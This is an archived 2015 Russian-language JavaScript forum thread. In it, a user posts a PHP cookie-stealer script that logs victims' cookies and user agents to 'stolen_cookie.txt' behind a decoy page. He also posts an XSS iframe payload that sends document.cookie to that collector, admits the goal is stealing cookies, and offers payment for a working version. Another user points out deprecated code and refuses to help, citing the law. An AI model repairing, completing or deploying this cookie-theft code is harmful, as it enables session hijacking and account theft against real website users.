Javascript-форум (https://javascript.ru/forum/)
-   Общие вопросы Javascript (https://javascript.ru/forum/misc/)
-   -   Не исполняется скрипт collect_cookie.php (https://javascript.ru/forum/misc/59113-ne-ispolnyaetsya-skript-collect_cookie-php.html)

Johny13 28.10.2015 14:23

Не исполняется скрипт collect_cookie.php
 
На просторах сети нашел такой PHP скрипт collect_cookie.php

<?php
$collectedCookie=$HTTP_GET_VARS["cookie"];
$date=date("l ds of F Y h:i:s A");
$user_agent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('stolen_cookie.txt','a');
fwrite($file,"DATE:$date || USER AGENT:$user_agent || COOKIE:$cookie \n");
fclose($file);
echo '<b>Извините, сайт находится в состоянии разработки. </b></br></br>Пожалуйста, нажмите<a
href="http://www.google.com/">здесь</a>, чтобы перейти на предыдущую страницу';
?>

к которому предлагается использовать следующий скрипт, размещаемый на любой странице, которая может быть открыта пользователем
<iframe width='0' height='0' frameborder='0'
src='<script>document.location='http://127.0.0.1/collect_cookie.php?
cookie='+escape(document.cookie);</script>' />

Я его устанавливал, но он у меня не заработал.
Вопрос: Не устарел ли он, рабочий?
С меня денежная благодарность, если кто то объяснит, что нужно, что бы он заработал или более правильная его реализация

laimas 28.10.2015 15:00

$HTTP_GET_VARS - давно устарело и не рекомендуется к использованию.

Вам это зачем нужно, для "своровать куки"?

Johny13 28.10.2015 15:05

Да, а как актуально?

laimas 28.10.2015 15:33

Воровство кук, это наказуемое деяние, вам это известно?

Johny13 28.10.2015 18:59

Известно, спасибо! совет дельный дадите или дальше будете запугивать себя?

laimas 28.10.2015 20:21

Нет не дам, своими руками плодить горе хацкеров нет никакого желания.


Часовой пояс GMT +3, время: 10:25.